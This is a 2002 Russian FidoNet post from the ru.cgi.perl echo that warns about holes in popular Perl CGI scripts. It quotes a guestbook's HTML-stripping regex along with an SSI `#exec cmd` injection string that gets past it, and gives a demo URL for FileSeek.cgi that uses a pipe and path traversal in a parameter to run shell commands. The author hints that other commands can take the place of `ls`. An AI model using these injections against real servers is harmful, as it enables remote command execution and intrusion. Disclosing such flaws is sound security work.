|
ru.cgi.perl
- RU.CGI.PERL ------------------------------------------------------------------
From : Alex Bachin 2:5020/400 30 Apr 2002 09:08:54
To : All
Subject : Люди, будбте бдительны!
--------------------------------------------------------------------------------
Тут от нечего делать решил проверить классиков
перловых скриптов на вшивость :)))
1. гостевая книга от www.worldwidemart.com
конечно, этого автора считают очень плохим скриптописателем,
но его скрипты распространены в инете
Итак: имеем конструкцию
$value =~ s/<!--(.|\n)*-->//g;
if ($allow_html != 1) {
$value =~ s/<([^>]|\n)*>//g;
}
Что получится при дефалтовом параметре $allow_html=1
и вводе в поле сообщения строки
<<!-- -->!--#exec cmd="ls /">
предоставляется вдумчивому читателю
Волосы дыбом встают
2. CGI/Perl Cookbook
http://www.cgi-perl.com/
Hебольшое издевательство над параметрами скрипта
FileSeek, например
http://www.cgi-perl.com/programs/FileSeek/Demo/FileSeek.cgi?head=|ls%20....//...
.//....//....//....//etc|
и вуаля!
вместо команды ls можно подставить и более интересные командочки :)))
"Какой удар от классика!" (с) Остап Бендер
--- ifmail v.2.15dev5
* Origin: Demos online service (2:5020/400)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
|
